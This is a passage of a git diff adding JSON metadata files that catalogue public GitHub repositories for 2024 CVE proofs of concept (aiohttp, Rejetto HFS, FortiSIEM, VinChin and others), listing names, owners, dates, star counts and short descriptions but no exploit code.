+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22867.json b/2024/CVE-2024-22867.json
new file mode 100644
index 0000000000..9f71725f0c
--- /dev/null
+++ b/2024/CVE-2024-22867.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 755770647,
+ "name": "CVE-2024-22867",
+ "full_name": "brandon-t-elliott\/CVE-2024-22867",
+ "owner": {
+ "login": "brandon-t-elliott",
+ "id": 126433368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126433368?v=4",
+ "html_url": "https:\/\/github.com\/brandon-t-elliott"
+ },
+ "html_url": "https:\/\/github.com\/brandon-t-elliott\/CVE-2024-22867",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-11T01:52:52Z",
+ "updated_at": "2024-02-11T01:52:52Z",
+ "pushed_at": "2024-02-11T01:52:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22889.json b/2024/CVE-2024-22889.json
new file mode 100644
index 0000000000..9debbb277f
--- /dev/null
+++ b/2024/CVE-2024-22889.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748125203,
+ "name": "CVE-2024-22889-Plone-v6.0.9",
+ "full_name": "shenhav12\/CVE-2024-22889-Plone-v6.0.9",
+ "owner": {
+ "login": "shenhav12",
+ "id": 93703363,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4",
+ "html_url": "https:\/\/github.com\/shenhav12"
+ },
+ "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-22889-Plone-v6.0.9",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-25T10:26:29Z",
+ "updated_at": "2024-01-25T10:26:29Z",
+ "pushed_at": "2024-01-25T10:50:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22890.json b/2024/CVE-2024-22890.json
new file mode 100644
index 0000000000..d8787e92ad
--- /dev/null
+++ b/2024/CVE-2024-22890.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742168455,
+ "name": "CVE-2024-22890",
+ "full_name": "BurakSevben\/CVE-2024-22890",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-22890",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-11T22:30:50Z",
+ "updated_at": "2024-01-30T21:51:15Z",
+ "pushed_at": "2024-01-31T00:26:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22894.json b/2024/CVE-2024-22894.json
new file mode 100644
index 0000000000..ce3b59f89e
--- /dev/null
+++ b/2024/CVE-2024-22894.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 749150559,
+ "name": "CVE-2024-22894",
+ "full_name": "Jaarden\/CVE-2024-22894",
+ "owner": {
+ "login": "Jaarden",
+ "id": 78766934,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78766934?v=4",
+ "html_url": "https:\/\/github.com\/Jaarden"
+ },
+ "html_url": "https:\/\/github.com\/Jaarden\/CVE-2024-22894",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-27T18:17:48Z",
+ "updated_at": "2024-05-29T11:39:21Z",
+ "pushed_at": "2024-05-29T11:39:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22899.json b/2024/CVE-2024-22899.json
new file mode 100644
index 0000000000..a689ea93a1
--- /dev/null
+++ b/2024/CVE-2024-22899.json
@@ -0,0 +1,52 @@
+[
+ {
+ "id": 714997705,
+ "name": "CVE-2024-22899-to-22903-ExploitChain",
+ "full_name": "Chocapikk\/CVE-2024-22899-to-22903-ExploitChain",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-22899-to-22903-ExploitChain",
+ "description": "Comprehensive Exploit Chain for Multiple Vulnerabilities in VinChin Backup & Recovery <= 7.2",
+ "fork": false,
+ "created_at": "2023-11-06T09:24:15Z",
+ "updated_at": "2024-03-19T20:19:29Z",
+ "pushed_at": "2024-02-01T17:24:13Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "authenticated-rce",
+ "cve-2024-22899",
+ "cve-2024-22900",
+ "cve-2024-22901",
+ "cve-2024-22902",
+ "cve-2024-22903",
+ "cybersecurity",
+ "ethical-hacking",
+ "exploit-chain",
+ "exploit-development",
+ "hacking-tools",
+ "infosec",
+ "open-source-security",
+ "penetration-testing",
+ "reverse-engineering",
+ "security-research",
+ "security-vulnerability",
+ "vinchin-exploit",
+ "vulnerability-research"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22909.json b/2024/CVE-2024-22909.json
new file mode 100644
index 0000000000..6f03acbb25
--- /dev/null
+++ b/2024/CVE-2024-22909.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742200216,
+ "name": "CVE-2024-22909",
+ "full_name": "BurakSevben\/CVE-2024-22909",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-22909",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T00:40:29Z",
+ "updated_at": "2024-01-30T22:29:11Z",
+ "pushed_at": "2024-01-31T00:27:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22922.json b/2024/CVE-2024-22922.json
new file mode 100644
index 0000000000..a7d4a1627f
--- /dev/null
+++ b/2024/CVE-2024-22922.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748143351,
+ "name": "CVE-2024-22922",
+ "full_name": "keru6k\/CVE-2024-22922",
+ "owner": {
+ "login": "keru6k",
+ "id": 73579653,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4",
+ "html_url": "https:\/\/github.com\/keru6k"
+ },
+ "html_url": "https:\/\/github.com\/keru6k\/CVE-2024-22922",
+ "description": "A Broken Authentication Vulnerability found in Projectworlds' Visitor Management System",
+ "fork": false,
+ "created_at": "2024-01-25T11:14:43Z",
+ "updated_at": "2024-01-25T11:18:28Z",
+ "pushed_at": "2024-01-25T11:17:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22939.json b/2024/CVE-2024-22939.json
new file mode 100644
index 0000000000..555ed62bc2
--- /dev/null
+++ b/2024/CVE-2024-22939.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748050298,
+ "name": "CVE-2024-22939",
+ "full_name": "NUDTTAN91\/CVE-2024-22939",
+ "owner": {
+ "login": "NUDTTAN91",
+ "id": 127911311,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127911311?v=4",
+ "html_url": "https:\/\/github.com\/NUDTTAN91"
+ },
+ "html_url": "https:\/\/github.com\/NUDTTAN91\/CVE-2024-22939",
+ "description": "CVE-2024-22939",
+ "fork": false,
+ "created_at": "2024-01-25T07:00:38Z",
+ "updated_at": "2024-04-08T02:43:41Z",
+ "pushed_at": "2024-01-25T07:30:38Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-22983.json b/2024/CVE-2024-22983.json
new file mode 100644
index 0000000000..87ff08d5fd
--- /dev/null
+++ b/2024/CVE-2024-22983.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748116927,
+ "name": "CVE-2024-22983",
+ "full_name": "keru6k\/CVE-2024-22983",
+ "owner": {
+ "login": "keru6k",
+ "id": 73579653,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4",
+ "html_url": "https:\/\/github.com\/keru6k"
+ },
+ "html_url": "https:\/\/github.com\/keru6k\/CVE-2024-22983",
+ "description": "An SQL injection Vulnerability in projectworlds' Visitor Management System",
+ "fork": false,
+ "created_at": "2024-01-25T10:05:00Z",
+ "updated_at": "2024-01-25T10:05:00Z",
+ "pushed_at": "2024-02-17T12:05:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23108.json b/2024/CVE-2024-23108.json
new file mode 100644
index 0000000000..34e7428627
--- /dev/null
+++ b/2024/CVE-2024-23108.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 803339715,
+ "name": "CVE-2024-23108",
+ "full_name": "horizon3ai\/CVE-2024-23108",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-23108",
+ "description": "CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection",
+ "fork": false,
+ "created_at": "2024-05-20T14:34:09Z",
+ "updated_at": "2024-06-10T11:34:26Z",
+ "pushed_at": "2024-05-21T11:56:19Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 807218249,
+ "name": "CVE-2024-23108",
+ "full_name": "hitem\/CVE-2024-23108",
+ "owner": {
+ "login": "hitem",
+ "id": 8977898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8977898?v=4",
+ "html_url": "https:\/\/github.com\/hitem"
+ },
+ "html_url": "https:\/\/github.com\/hitem\/CVE-2024-23108",
+ "description": "POC iteration for CVE-2024-23108 which can use -l for list input",
+ "fork": false,
+ "created_at": "2024-05-28T17:21:11Z",
+ "updated_at": "2024-06-19T15:35:27Z",
+ "pushed_at": "2024-05-28T17:36:52Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23208.json b/2024/CVE-2024-23208.json
new file mode 100644
index 0000000000..871665c233
--- /dev/null
+++ b/2024/CVE-2024-23208.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 752559136,
+ "name": "CVE-2024-23208-test",
+ "full_name": "hrtowii\/CVE-2024-23208-test",
+ "owner": {
+ "login": "hrtowii",
+ "id": 68852354,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68852354?v=4",
+ "html_url": "https:\/\/github.com\/hrtowii"
+ },
+ "html_url": "https:\/\/github.com\/hrtowii\/CVE-2024-23208-test",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-04T07:37:21Z",
+ "updated_at": "2024-06-18T04:31:00Z",
+ "pushed_at": "2024-02-05T02:11:42Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23334.json b/2024/CVE-2024-23334.json
new file mode 100644
index 0000000000..989a25e690
--- /dev/null
+++ b/2024/CVE-2024-23334.json
@@ -0,0 +1,182 @@
+[
+ {
+ "id": 764890801,
+ "name": "CVE-2024-23334",
+ "full_name": "ox1111\/CVE-2024-23334",
+ "owner": {
+ "login": "ox1111",
+ "id": 31942498,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4",
+ "html_url": "https:\/\/github.com\/ox1111"
+ },
+ "html_url": "https:\/\/github.com\/ox1111\/CVE-2024-23334",
+ "description": "CVE-2024-23334",
+ "fork": false,
+ "created_at": "2024-02-28T22:30:21Z",
+ "updated_at": "2024-06-17T18:09:45Z",
+ "pushed_at": "2024-02-29T02:00:16Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 773320217,
+ "name": "aiohttp-exploit-CVE-2024-23334-certstream",
+ "full_name": "sxyrxyy\/aiohttp-exploit-CVE-2024-23334-certstream",
+ "owner": {
+ "login": "sxyrxyy",
+ "id": 125439203,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4",
+ "html_url": "https:\/\/github.com\/sxyrxyy"
+ },
+ "html_url": "https:\/\/github.com\/sxyrxyy\/aiohttp-exploit-CVE-2024-23334-certstream",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-17T10:56:02Z",
+ "updated_at": "2024-06-17T18:09:46Z",
+ "pushed_at": "2024-03-18T12:25:54Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 774035199,
+ "name": "CVE-2024-23334-PoC",
+ "full_name": "z3rObyte\/CVE-2024-23334-PoC",
+ "owner": {
+ "login": "z3rObyte",
+ "id": 67548295,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67548295?v=4",
+ "html_url": "https:\/\/github.com\/z3rObyte"
+ },
+ "html_url": "https:\/\/github.com\/z3rObyte\/CVE-2024-23334-PoC",
+ "description": "A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1",
+ "fork": false,
+ "created_at": "2024-03-18T20:39:27Z",
+ "updated_at": "2024-06-17T18:09:47Z",
+ "pushed_at": "2024-03-19T06:37:30Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 774488632,
+ "name": "CVE-2024-23334",
+ "full_name": "jhonnybonny\/CVE-2024-23334",
+ "owner": {
+ "login": "jhonnybonny",
+ "id": 87495218,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4",
+ "html_url": "https:\/\/github.com\/jhonnybonny"
+ },
+ "html_url": "https:\/\/github.com\/jhonnybonny\/CVE-2024-23334",
+ "description": "aiohttp LFI (CVE-2024-23334)",
+ "fork": false,
+ "created_at": "2024-03-19T16:28:56Z",
+ "updated_at": "2024-06-21T03:37:47Z",
+ "pushed_at": "2024-03-19T17:06:26Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 792749810,
+ "name": "poc-cve-2024-23334",
+ "full_name": "brian-edgar-re\/poc-cve-2024-23334",
+ "owner": {
+ "login": "brian-edgar-re",
+ "id": 111369381,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111369381?v=4",
+ "html_url": "https:\/\/github.com\/brian-edgar-re"
+ },
+ "html_url": "https:\/\/github.com\/brian-edgar-re\/poc-cve-2024-23334",
+ "description": "This repository contains a proof of concept about the exploitation of the aiohttp library for the reported vulnerability CVE-2024-23334.",
+ "fork": false,
+ "created_at": "2024-04-27T13:21:50Z",
+ "updated_at": "2024-04-29T01:40:19Z",
+ "pushed_at": "2024-04-29T01:40:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 816384401,
+ "name": "CVE-2024-23334",
+ "full_name": "binaryninja\/CVE-2024-23334",
+ "owner": {
+ "login": "binaryninja",
+ "id": 5916066,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5916066?v=4",
+ "html_url": "https:\/\/github.com\/binaryninja"
+ },
+ "html_url": "https:\/\/github.com\/binaryninja\/CVE-2024-23334",
+ "description": "Expolit for CVE-2024-23334 (aiohttp >= 1.0.5> && <=3.9.1)",
+ "fork": false,
+ "created_at": "2024-06-17T16:28:35Z",
+ "updated_at": "2024-06-17T21:04:42Z",
+ "pushed_at": "2024-06-17T16:37:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23652.json b/2024/CVE-2024-23652.json
new file mode 100644
index 0000000000..35c4bcb3c7
--- /dev/null
+++ b/2024/CVE-2024-23652.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 765626764,
+ "name": "CVE-2024-23652",
+ "full_name": "abian2\/CVE-2024-23652",
+ "owner": {
+ "login": "abian2",
+ "id": 156372457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156372457?v=4",
+ "html_url": "https:\/\/github.com\/abian2"
+ },
+ "html_url": "https:\/\/github.com\/abian2\/CVE-2024-23652",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-01T09:50:00Z",
+ "updated_at": "2024-03-01T09:50:51Z",
+ "pushed_at": "2024-03-01T09:50:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23692.json b/2024/CVE-2024-23692.json
new file mode 100644
index 0000000000..7e7a0bdd2a
--- /dev/null
+++ b/2024/CVE-2024-23692.json
@@ -0,0 +1,242 @@
+[
+ {
+ "id": 813486426,
+ "name": "CVE-2024-23692",
+ "full_name": "k3lpi3b4nsh33\/CVE-2024-23692",
+ "owner": {
+ "login": "k3lpi3b4nsh33",
+ "id": 118002757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4",
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33"
+ },
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-23692",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-11T07:21:04Z",
+ "updated_at": "2024-06-14T19:21:27Z",
+ "pushed_at": "2024-06-11T08:05:50Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814492032,
+ "name": "CVE-2024-23692-RCE-in-Rejetto-HFS",
+ "full_name": "jakabakos\/CVE-2024-23692-RCE-in-Rejetto-HFS",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-23692-RCE-in-Rejetto-HFS",
+ "description": "Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)",
+ "fork": false,
+ "created_at": "2024-06-13T06:00:24Z",
+ "updated_at": "2024-06-14T03:05:11Z",
+ "pushed_at": "2024-06-13T07:00:23Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814570994,
+ "name": "CVE-2024-23692",
+ "full_name": "vanboomqi\/CVE-2024-23692",
+ "owner": {
+ "login": "vanboomqi",
+ "id": 97789149,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97789149?v=4",
+ "html_url": "https:\/\/github.com\/vanboomqi"
+ },
+ "html_url": "https:\/\/github.com\/vanboomqi\/CVE-2024-23692",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-13T09:12:06Z",
+ "updated_at": "2024-06-21T13:35:29Z",
+ "pushed_at": "2024-06-15T15:30:45Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814670168,
+ "name": "CVE-2024-23692-RCE",
+ "full_name": "WanLiChangChengWanLiChang\/CVE-2024-23692-RCE",
+ "owner": {
+ "login": "WanLiChangChengWanLiChang",
+ "id": 171075497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4",
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang"
+ },
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-23692-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-13T13:13:10Z",
+ "updated_at": "2024-06-13T14:43:57Z",
+ "pushed_at": "2024-06-13T14:43:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814916351,
+ "name": "CVE-2024-23692",
+ "full_name": "Mr-r00t11\/CVE-2024-23692",
+ "owner": {
+ "login": "Mr-r00t11",
+ "id": 68824333,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4",
+ "html_url": "https:\/\/github.com\/Mr-r00t11"
+ },
+ "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-23692",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T01:33:19Z",
+ "updated_at": "2024-06-14T01:47:48Z",
+ "pushed_at": "2024-06-14T01:47:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815792680,
+ "name": "CVE-2024-23692-exp",
+ "full_name": "Tupler\/CVE-2024-23692-exp",
+ "owner": {
+ "login": "Tupler",
+ "id": 42026413,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42026413?v=4",
+ "html_url": "https:\/\/github.com\/Tupler"
+ },
+ "html_url": "https:\/\/github.com\/Tupler\/CVE-2024-23692-exp",
+ "description": "CVE-2024-23692 exp",
+ "fork": false,
+ "created_at": "2024-06-16T07:04:01Z",
+ "updated_at": "2024-06-16T07:05:17Z",
+ "pushed_at": "2024-06-16T07:05:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 816201672,
+ "name": "CVE-2024-23692",
+ "full_name": "BBD-YZZ\/CVE-2024-23692",
+ "owner": {
+ "login": "BBD-YZZ",
+ "id": 132546612,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4",
+ "html_url": "https:\/\/github.com\/BBD-YZZ"
+ },
+ "html_url": "https:\/\/github.com\/BBD-YZZ\/CVE-2024-23692",
+ "description": "CVE-2024-23692",
+ "fork": false,
+ "created_at": "2024-06-17T08:46:48Z",
+ "updated_at": "2024-06-18T01:24:01Z",
+ "pushed_at": "2024-06-18T01:23:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 816587020,
+ "name": "CVE-2024-23692-EXP",
+ "full_name": "0x20c\/CVE-2024-23692-EXP",
+ "owner": {
+ "login": "0x20c",
+ "id": 25526653,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4",
+ "html_url": "https:\/\/github.com\/0x20c"
+ },
+ "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-23692-EXP",
+ "description": "CVE-2024-23692 Exploit",
+ "fork": false,
+ "created_at": "2024-06-18T03:27:47Z",
+ "updated_at": "2024-06-19T02:23:05Z",
+ "pushed_at": "2024-06-18T04:06:25Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23722.json b/2024/CVE-2024-23722.json
new file mode 100644
index 0000000000..3a0a7f1723
--- /dev/null
+++ b/2024/CVE-2024-23722.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 777360363,
